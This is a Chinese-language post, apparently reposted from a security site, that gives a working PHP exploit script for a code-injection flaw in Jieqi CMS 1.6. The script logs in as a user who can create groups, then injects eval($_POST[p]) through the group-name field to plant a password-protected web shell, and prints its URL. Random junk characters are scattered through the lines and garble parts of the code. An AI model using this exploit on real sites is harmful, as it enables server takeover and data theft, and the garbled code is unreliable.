杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
需要有一个能创建圈子的用户。
8 e2 q2 p2 o! n2 r, W<?php& M; k8 r+ M. x
^( U0 X' ` s* G' oprint_r('
5 k. |1 U9 T# l" p3 ^) y2 H% M# n# A6 T+---------------------------------------------------------------------------+4 m) B! {/ w; ?. l" y# |
Jieqi CMS V1.6 PHP Code Injection Exploit
2 f" e4 K/ b2 Q6 ]9 b3 q8 H) `8 Oby flyh4t
8 L, ^! T4 v- Z3 Q/ H8 Lmail: phpsec at hotmail dot com
# h, f1 m" e x& q. {team: http://www.wolvez.org/ v3 @: V- }5 K& I* |. _# [: T$ v
+---------------------------------------------------------------------------+! g$ N1 i1 \" K2 u$ p8 U2 G5 U: ?" l
'); /**
! u! M2 d, a! C4 q7 w' _% e' z * works regardless of php.ini settings
2 u# O3 M$ Z. M' [*/ if ($argc < 5) { print_r('
1 L. q/ i3 v8 i! R$ `1 O$ @+---------------------------------------------------------------------------+, Q" K! |- G! B# E5 b
Usage: php '.$argv[0].' host path username7 P# P. K( y: V: {9 P
host: target server (ip/hostname)+ o& A( A! V1 B+ C# z
path: path to jieqicms
$ Q5 i. b' z* }; A( g2 ?+ }$ T$ cuasename: a username who can create group; Y% ^ w7 [, g
Example:
6 o5 E: o& V, A/ D: z4 B6 V G8 Gphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password+ }4 S! M: f c9 C1 v
+---------------------------------------------------------------------------+
* P- |2 g: H' j ?5 F4 B+ O' ~, K+ v'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
& q6 D0 I# H' z; k. [Content-Disposition: form-data; name="gname") Q K' l+ V$ x8 d. E: D
% m) S) ?- m& X( L* T" W- N9 t
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
0 V( @+ u* R5 T1 a; `1 ]-----------------------------23281168279961
: @7 T9 k9 e; `" {) s% qContent-Disposition: form-data; name="gcatid"
6 j4 e8 @- v8 O$ Y( s' e
6 B5 e5 ]# | x9 s1* M0 O4 s8 Y9 g8 j5 F0 I& M" `
-----------------------------23281168279961" f9 J8 v/ B6 Y
Content-Disposition: form-data; name="gaudit"
# W, a8 P& J$ o" O3 R
J' n# N4 J% [: ]1' O1 H. G2 s$ U. a! u6 W/ K# |
-----------------------------232811682799613 T/ R0 U; R, [" x1 P7 l8 g
Content-Disposition: form-data; name="gbrief"- K* B& z+ }+ G4 l
2 O! F. p% V" b$ A
1
1 Y: t& R' q! ]. d-----------------------------23281168279961--1 k% v1 L* A/ v! C+ D
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
- T) @2 ^% ] W) C3 c 5 l2 K" E* V0 Q" _( u( Z
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |